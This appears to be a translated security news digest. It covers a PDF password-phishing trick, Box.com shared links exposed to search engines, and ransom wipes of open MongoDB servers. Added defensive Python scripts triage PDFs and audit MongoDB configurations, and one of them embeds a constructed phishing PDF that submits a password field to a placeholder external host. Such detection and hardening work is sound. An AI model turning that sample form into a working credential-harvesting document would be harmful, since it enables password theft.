
Security Week 01-02: vulnerability in box.com, password phishing in PDF, attacks on MongoDB

While the editors of the weekly security digests were in post-New Year prostration, the flow of politics spilled over into the threat landscape. There was a lot of cybersecurity in the news headlines and in the statements of politicians, but we will not succumb to provocation: nothing there affected anyone's real protection. The investigation into the hacking of the US Democratic National Committee will certainly affect the information security field somehow, but it is by no means certain that it will do so in a positive way. So we will keep following less loud events that are a little richer in interesting facts.

Let's start with an interesting phishing trick using PDF, reported by the SANS Institute. When the user opens a document in this format, it tells them that the document is "blocked" and asks them to enter a login and password. The password is then sent to the attacker's server. There are two interesting points here. First, it is blind phishing: it is not clear which password the user is supposed to enter, the one for their account, for their mail, or for something else. This does not bother the intruders: the expectation is that the password is the same everywhere.

Secondly, when the document tries to send data to the server, Adobe Reader displays a warning. But the viewer built into the Microsoft Edge browser, for example, sends the entered information silently, without a declaration of war. A similar method (a message about allegedly blocked content) is used in MS Word attachments, but there the aim is to force the user to execute malicious code.
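The mechanism behind this trick is an ordinary PDF form: a text field with the "password" flag set and a button whose action submits the form contents to a URL. A defender triaging mail attachments can look for exactly that combination before any viewer gets to decide whether to warn. The script below is an added example written for this digest, not code from SANS or from the original post; the two PDF byte strings are constructed samples, and `collector.example` is a placeholder hostname. It only inspects uncompressed objects, which is enough to show the structure.

```python
import re

# Constructed sample (not a real malicious file): a minimal uncompressed PDF whose
# AcroForm holds a password-type text field and a button whose /SubmitForm action
# posts the form to an external URL, mirroring the structure described above.
PHISHING_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [4 0 R 5 0 R] >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R] >>
endobj
4 0 obj
<< /Subtype /Widget /FT /Tx /T (password) /Ff 8192 /Rect [50 50 250 70] >>
endobj
5 0 obj
<< /Subtype /Widget /FT /Btn /T (Unlock) /Rect [50 20 150 40]
   /A << /S /SubmitForm /F (https://collector.example/unlock) /Flags 4 >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Constructed benign sample: one page, no form, no actions.
BENIGN_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"\d+\s+\d+\s+obj(.*?)endobj", re.DOTALL)
# A /SubmitForm action followed (within the same object) by an /F (url) string.
SUBMIT_URL_RE = re.compile(rb"/S\s*/SubmitForm.{0,300}?/F\s*\(([^)]*)\)", re.DOTALL)
TEXT_FIELD_RE = re.compile(rb"/FT\s*/Tx")
FIELD_FLAGS_RE = re.compile(rb"/Ff\s*(\d+)")
PASSWORD_FLAG = 1 << 13  # text-field flag bit 14 ("Password") in the PDF spec


def submit_targets(data):
    """Return the URLs that /SubmitForm actions would post the form contents to."""
    urls = []
    for obj in OBJ_RE.finditer(data):
        for m in SUBMIT_URL_RE.finditer(obj.group(1)):
            urls.append(m.group(1).decode("latin-1"))
    return urls


def has_password_field(data):
    """True if any text field in the file is rendered as a masked password box."""
    for obj in OBJ_RE.finditer(data):
        body = obj.group(1)
        flags = FIELD_FLAGS_RE.search(body)
        if TEXT_FIELD_RE.search(body) and flags and int(flags.group(1)) & PASSWORD_FLAG:
            return True
    return False


def assess(data):
    """Triage verdict: a password field plus a submit action to an external URL."""
    urls = submit_targets(data)
    external = [u for u in urls if u.lower().startswith(("http://", "https://"))]
    pw = has_password_field(data)
    return {
        "submit_urls": urls,
        "external_submit": bool(external),
        "password_field": pw,
        "suspicious": pw and bool(external),
    }


if __name__ == "__main__":
    for name, sample in (("phishing", PHISHING_PDF), ("benign", BENIGN_PDF)):
        print(name, assess(sample))
```

Real attachments usually keep their objects inside FlateDecode streams or object streams, so in practice you would decompress with a PDF library first and then run the same checks over the expanded objects; the regexes are a heuristic for triage, not a parser. Note that the external submit is the step at which Adobe Reader shows its warning and, according to the digest, the Edge viewer does not, so a gateway-side check like this is the only place the user is protected in the latter case.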

Box.com closes a vulnerability that allowed you to google confidential documents
News

A curious vulnerability was discovered by researcher Markus Neuss of Swisscom. Using fairly trivial search-engine settings, he found a way to "google" confidential documents belonging to users of corporate accounts on the Box.com service. The "leak" occurred when a user wanted to share information with someone and created a special link for that purpose. Access to the content is supposed to be possible only for someone who has the link, but it turned out that the shared folders were being indexed by a search engine.

The problem is so trivial that it is hard to call it a vulnerability, but there have been many such cases. Box.com even claimed that the links ended up in search results because they had been posted on public resources. But it then decided to block search-engine indexing of this conditionally public content anyway.

Owners of incorrectly configured databases on MongoDB extort money
News

And one more piece of news about misconfiguration. At the end of last year, Victor Gevers of the GDI Foundation discovered several instances of attacks on incorrectly configured MongoDB databases. Incorrectly, in the sense of being accessible from the network with broad rights. The attack went as follows: the attacker deleted all the contents of the database on the server and left a note demanding a ransom of 0.2 bitcoin (a little more than $200). Over the past two weeks the number of attacks has increased many times over. As of January 9, researchers counted more than 28 thousand attacked servers.



How exactly the hacked servers are being tracked is not reported, but apparently the same tools are used as for the hacking itself: searching via the specialized search engine Shodan and scanning the servers found. It is reported that after the topic was publicized, a free-for-all broke out on the attacked servers: since they remain open after being hacked, they are sometimes attacked several times, by different groups, and the ransom note may be replaced by another one several times over. The MongoDB developers responded with detailed instructions on how to configure the database properly.
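The two settings that made these servers "incorrectly configured" in the sense above are the listening address and access control. The script below is an added example, not part of the original post or of MongoDB's own guidance: it reads the YAML-style mongod.conf, treats a missing `net.bindIp` as listening on all interfaces (the default before MongoDB 3.6), and reports when the server is both network-reachable and running without `security.authorization`. The two configuration texts are constructed samples; the tiny parser assumes two-space indentation, scalar values and no lists, which covers the keys in question.

```python
# Constructed weak configuration: listens on every interface with no access control.
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
"""

# Constructed hardened configuration: loopback only, access control enabled.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_simple_yaml(text):
    """Minimal parser for the nested-mapping subset used by mongod.conf.
    Assumption (this example's own): two-space indentation, scalar values only,
    no lists, anchors or multi-line strings."""
    root = {}
    stack = [(-1, root)]  # (indent level, mapping being filled)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()  # drop comments and trailing space
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        while indent <= stack[-1][0]:  # climb back out of deeper mappings
            stack.pop()
        parent = stack[-1][1]
        if value.strip() == "":  # "net:" opens a nested mapping
            child = {}
            parent[key] = child
            stack.append((indent, child))
        else:
            parent[key] = value.strip().strip("\"'")
    return root


def audit_mongod_conf(text):
    """Flag a mongod that is reachable from the network without authorization."""
    cfg = parse_simple_yaml(text)
    net = cfg.get("net", {})
    sec = cfg.get("security", {})
    findings = []
    # Absent bindIp: treat as 0.0.0.0, which was the default before MongoDB 3.6.
    addrs = [a.strip() for a in net.get("bindIp", "0.0.0.0").split(",")]
    exposed = any(a not in LOOPBACK for a in addrs)
    if exposed:
        findings.append("net.bindIp listens on a non-loopback interface: " + ", ".join(addrs))
    auth_on = sec.get("authorization", "disabled").lower() == "enabled"
    if not auth_on:
        findings.append("security.authorization is not enabled")
    return {
        "bindIp": addrs,
        "exposed": exposed,
        "authorization": auth_on,
        "findings": findings,
        # The combination the ransom attacks relied on: open port, no credentials.
        "critical": exposed and not auth_on,
    }


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(conf))
```

A file-level check like this is only half the picture: mongod also accepts the older ini-style options (`bind_ip`, `auth`) and command-line flags that this parser does not see, and a database that legitimately needs a non-loopback address should still be fenced by a host firewall. Confirm the result from a second host by checking that port 27017 is not reachable, which is the same condition the attackers were selecting for.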

What else remains to do?

Antiquities


"Amoeba-2367"

A very dangerous resident ghost virus. It typically infects .COM and .EXE files as they are executed or opened. On March 21 and November 1 it destroys information on the hard drive. Intercepts int 21h. Contains the texts:

"To see a world in a grain of sand,
And a heaven in a wildflower
Hold your hand
And Eternity in an hour.";

"THE VIRUS 16/3/91 AMOEBA virus for the Hacker Twins © 1991 wait our our s s s» »» »!"

Quote from the book "Computer Viruses in MS-DOS" by Eugene Kaspersky, 1992, page 59.

Disclaimer: This column reflects only the personal opinion of its author. It may or may not coincide with the position of Kaspersky Lab. That is down to luck.

Source: https://habr.com/ru/post/319502/
